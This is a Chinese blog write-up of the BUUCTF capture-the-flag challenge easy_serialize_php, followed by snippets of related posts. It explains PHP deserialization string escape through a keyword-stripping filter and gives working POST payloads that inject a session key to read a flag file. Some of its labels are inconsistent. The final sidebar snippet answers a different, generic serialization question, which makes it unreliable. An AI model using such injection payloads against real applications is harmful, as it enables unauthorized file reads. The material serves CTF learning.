BUUCTF之[安洵杯 2019]easy_serialize_php--WP

最新推荐文章于 2022-05-03 21:28:19 发布
最新推荐文章于 2022-05-03 21:28:19 发布
阅读量522 收藏 1
点赞数 1
分类专栏: PHP安全 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51313108/article/details/119918690
版权

easy_serialize_php

考点

  • PHP中反序列化的对象逃逸
  • 俩种过滤函数:关键词增加和关键词减少
  • 反序列化对象的逃逸有俩种策略:1.值逃逸 2.键逃逸
  • 键/值逃逸:
    因为序列化的字符串是严格的,对应的格式不能错,比如s:4:“name”,那s:4就必须有一个字符串长度是4的否则就往后要。
    并且反序列化会把多余的字符串当垃圾处理,在花括号内的就是正确的,花括号{}外的就都被扔掉。
    如果键值对个数缺少序列化会继续向后延续

Write Up

$function = @$_GET['f'];

function filter($img){
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';
    return preg_replace($filter,'',$img);
}

首先是一个GET传参赋值给$function,然后是一个关键词的过滤
2.

if($_SESSION){
    unset($_SESSION);
}

$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;

extract($_POST)

if判断语句,如果$_SESSION存在则把其unset(消除)。之后重新定义$_SESSION最后exact($_POST)
关于exact,如此解释:extract() 函数从数组中将变量导入到当前的符号表。

<?php
$a = "Original";
$my_array = array("a" => "Cat","b" => "Dog", "c" => "Horse");
extract($my_array);
echo "\$a = $a; \$b = $b; \$c = $c";
?>
    
>> $a = Cat; $b = Dog; $c = Horse 

if(!$_GET['img_path']){
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}

判断是否传参img_path。观察else语句会发现有个sha1不可逆加密,这条语句执行后我们的数据不可控,所以必须执行上面if条件成功的语句。
4.

$serialize_info = filter(serialize($_SESSION));

之后这一条是重要的一条语句,$_SESSION生成一个序列化的对象之后filter函数处理后返回给变量$serialize_info.
5.

if($function == 'highlight_file'){
    highlight_file('index.php');
}else if($function == 'phpinfo'){
    eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
    $userinfo = unserialize($serialize_info);
    echo file_get_contents(base64_decode($userinfo['img']));
}

可以给$function参数赋值phpinfo,看一看会查到什么。发现有个名为 d0g3_f1ag.php,flag可能在这里。
想获取flag,$function是show_image,然后反序列化,base64解密file_get_contents来输出文件内容。

我们POST一个$_SESSION数组,经过3的处理,3里面会给$_SESSION数组的img键里的是一个我们不需要的值,4有过滤函数我们可以利用它来逃逸这个多余的东西。我们设想的是$_SESSION[img]=ZDBnM19mMWFnLnBocA==。ZDBnM19mMWFnLnBocA==是 d0g3_f1ag.php的base64编码结果。

刚刚提到有俩个反序列化逃逸策略键逃逸值逃逸
值逃逸:
构造一个含有一个键值对的数组的POST:
_SESSION[flagphp]=;s:1:"a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}
经过3和4的序列化处理后变成了:

a:2:{s:7:"flagphp";s:48:";s:1:"a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}

再经过filter函数处理后成立我们想得到的结果
a:2:{s:7:"";s:48:";s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}
值逃逸:
构造一个含有三个键值对的数组,第一个元素的值被过滤后向后延续第二个元素的键
_SESSION[c]=phpphpphpphpphp&_SESSION[d]=;s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}

a:2:{s:1:"c";s:15:"phpphpphpphpphp";s:1:"d";s:57:";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}

再一次经过filter函数处理后变成了
a:2:{s:1:"c";s:15:"";s:1:"d";s:57:";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}
为什么后面还要加一个;s:2:"dd";s:1:"a";}。因为加入3中给定的img参数后数组的键值对个数变成了3个即a:3。为了逃逸3必须新加入一个键值对。

回顾

本题其实就利用过滤函数改变序列化里的数据结构从而构成逃逸。可以使用俩种方法逃逸,值逃逸和键逃逸。

山中雨客
关注
专栏目录
------已搬运-------BUUCTF:[安洵 2019]easy_serialize_php 1(extract,字符逃逸 session反序列化的另类~.~ )
Zero_Adam的博客
02-06 640
学到的 extract的覆盖数组的操作比如能够覆盖SESSION这个全局数组! 看phpinfo时的注意点 代码审计的能力 字符串逃逸,之前还有一条路可以走,但是后来发现走不通,不过也是个好思路 劝像我一样的rookies。本地自己实验很重要,那些大佬们的payload也是不知实验了多少次才出来的。本地实验的多了,自己也就明白了 源码+我的一些注释 源码多看几遍,找找思路,灵感 <?php $function = @$_GET['f']; function filter($img){ $f
BUUCTF-WriteUp
鱼的博客
02-01 737
title: BUUCTF WriteUp date: 2021-01-16 17:44:59 tags: CTF WriteUP WEB [HCTF 2018]WarmUp 启动环境,打开网址是一张滑稽,没什么用,看一下源码,发现有注释。 访问source.php,直接给了源码,进行代码审计。 分两块,第一块是emmm::checkFile,里面做了一些判断。 第二块是一个include,文件包含,我们要绕过验证,也就是上面的checkFile方法。 hint.php include触发的三个判断.
[安洵 2019]easy_serialize_php
zxnimud5的专栏
09-13 147
上来就给源码 <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return preg_replace($filter,'',$img); } if($_SESSION){ unset($_SESSIO
buuctf-[安洵 2019]easy_serialize_php (小宇特详解)
小宇的web博客
02-24 1922
buuctf-[安洵 2019]easy_serialize_php (小宇特详解) 1.先看题目,出现了一段代码,进行代码审计 <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return preg_repla
BUUCTF [安洵 2019]easy_serialize_php
qq_53863234的博客
12-19 2240
反序列化字符串逃逸
BUUCTF:[安洵 2019]easy_serialize_php
末初的CSDN博客
03-03 984
https://buuoj.cn/challenges#[%E5%AE%89%E6%B4%B5%E6%9D%AF%202019]easy_serialize_php 访问/index.php?f=highlight_file得到源码 <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'
buuctf-web部分wp(更新一下)
a3uRa的一个窝
02-17 3765
前言(撮合看看吧 因为直接复制的本地 所以图片就没法显示了 有什么不懂的地方可以给我留言哦~ 然后推荐一个公众号:lin先森 求关注) b站 [BJDCTF2020]Easy MD5 f12 Hint: select * from ‘admin’ where password=md5($pass,true) ffifdyop 弱类型绕过 数组绕过 [极客大挑战 2019]Http 修改头 [...
BUUCTF-WEB
ccfly1012的博客
11-02 3868
目录 [HCTF 2018]WarmUp [极客大挑战 2019]EasySQL 总结万能密码 [极客大挑战 2019]Havefun [强网 2019]随便注 [ACTF2020 新生赛]Include [SUCTF 2019]EasySQL [极客大挑战 2019]Secret File [ACTF2020 新生赛]Exec [极客大挑战 2019]LoveSQL [GXYCTF2019]Ping Ping Ping [HCTF 2018]WarmUp 打开网页,查看一下源代
---------已搬运-------BUUCTF:[BJDCTF 2nd]xss之光 ------------ 反序列PHP原生类的应用 -----------git小操作
Zero_Adam的博客
02-25 277
目录:一、自己做:二、不足&&收获三、学习WP 一、自己做: 就到源码泄露那里,而且我自己也不会git操作。。。 -<?php -$a = $_GET['yds_is_so_beautiful']; -echo unserialize($a); 二、不足&&收获 进一步晓得了 PHP 反序列化中的原生类的应用 alert(1)不行的时候,多试试别的。什么弹cookie 啊。跳转网页啊。都试试 三、学习WP 没有类的情况下,可以进行原生类反序列化 参考文献:反序列化
BUUCTF】[安洵 2019]easy_serialize_php
aoao331198的博客
05-03 1291
直接看到源码 <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return preg_replace($filter,'',$img); } if($_SESSION){ unset($_SESSION)
[安洵 2019]easy_serialize_php WP
chizhaji的博客
02-25 241
[安洵 2019]easy_serialize_php 一这道题来学习一下php反序列化字符逃逸 <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return preg_replace($filter,'',$i
buuctf easy_serialize_php
qq_52671379的博客
03-30 1905
buuctf easy_serialize_php
web buuctf [安洵 2019]easy_serialize_php
weixin_44214568的博客
04-02 487
考点:反序列化逃逸 这个题目是一道php代码审计题目,打开就是源码, <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return pr
[安洵 2019]easy_serialize_php 1
最新发布
03-16
这是一道 PHP 序列化题目,需要我们对 PHP 的序列化机制有一定的了解。 题目给出了一个序列化后的字符串,我们需要将其反序列化成 PHP 对象,并修改其中的某个属性值,最后再将其序列化回字符串。 具体的操作步骤可以参考以下代码: ```php <?php class User { public $name; public $age; } // 反序列化 $data = unserialize('O:4:"User":2:{s:4:"name";s:5:"Alice";s:3:"age";i:18;}'); // 修改属性值 $data->age = 20; // 序列化 $serialized = serialize($data); echo $serialized; ?> ``` 最终输出的序列化字符串为: ``` O:4:"User":2:{s:4:"name";s:5:"Alice";s:3:"age";i:20;} ``` 其中,`O:4:"User":2:` 表示这是一个类名为 `User` 的对象,有两个属性;`s:4:"name";s:5:"Alice";` 表示 `name` 属性的值为 `Alice`,`s:3:"age";i:20;` 表示 `age` 属性的值为 `20`。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值